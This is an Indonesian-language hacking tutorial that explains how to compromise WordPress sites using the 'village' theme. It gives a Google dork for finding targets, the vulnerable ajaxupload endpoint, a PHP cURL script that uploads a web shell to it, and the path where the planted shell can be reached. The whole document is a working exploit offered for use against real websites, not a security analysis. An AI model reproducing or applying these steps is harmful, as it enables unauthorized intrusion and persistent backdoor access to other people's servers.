-Niat
-Koneksi Internet
-XAMPP (Serch Di Google Banyak)
-Shell
Langkah-Langkah:
1).Search Di Google Gunakan Dork
inurl:/wp-content/themes/village
2).Jika Ketemu Masukan Exploit /wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php
3).Jika Web Vuln Akan Keluar Tulisan {"error":"No files were uploaded."}
4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D
<?php
$uploadfile="shell.php";
$ch =
curl_init("http://site/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D
5).Aktifkan XAMPP Klik Start Pada Apache
6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php
8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Seperti Gambar Seperti Ini
10).Untuk Letak Shell nanti ada di
http://ste/wp-content/themes/village/blueprint/gallery/ajaxupload/server/uploads/yourshell.php
Thanks To Java Cyber
0 komentar